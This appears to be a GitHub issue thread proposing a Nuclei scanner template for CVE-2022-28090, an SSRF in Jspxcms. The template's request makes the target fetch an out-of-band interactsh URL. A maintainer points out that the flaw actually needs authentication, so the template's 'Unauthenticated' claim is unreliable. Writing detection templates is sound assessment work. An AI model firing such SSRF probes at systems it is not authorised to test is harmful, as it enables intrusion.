nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard
Published 4 months ago verified publisher icon projectdiscovery

CVE-2022-28090

Open akincibor opened this issue 3 years ago • 1 comments 

id: CVE-2022-28090

info:
  name: Jspxcms < 10.2.0 - Unauthenticated SSRF
  author: Akincibor
  severity: high
  description: Jspxcms v10.2.0 allows attackers to execute a Server-Side Request Forgery (SSRF) via /cmscp/ext/collect/fetch_url.do?url=.
  reference:
    - https://gitee.com/jspxcms/Jspxcms/issues/I4ZKDR
  tags: ssrf,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cmscp/ext/collect/fetch_url.do?url=https://{{interactsh-url}}/'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

akincibor avatar May 04 '22 15:05 akincibor

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻

As mentioned in the reference here, this is an authenticated issue.

When not logged in, the access trigger point will jump to the login page

princechaddha avatar May 24 '22 08:05 princechaddha

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻 Since there has been no activity on this issue, I am closing it. However, please feel free to open a new issue for this CVE if you have more details.

princechaddha avatar Apr 17 '23 03:04 princechaddha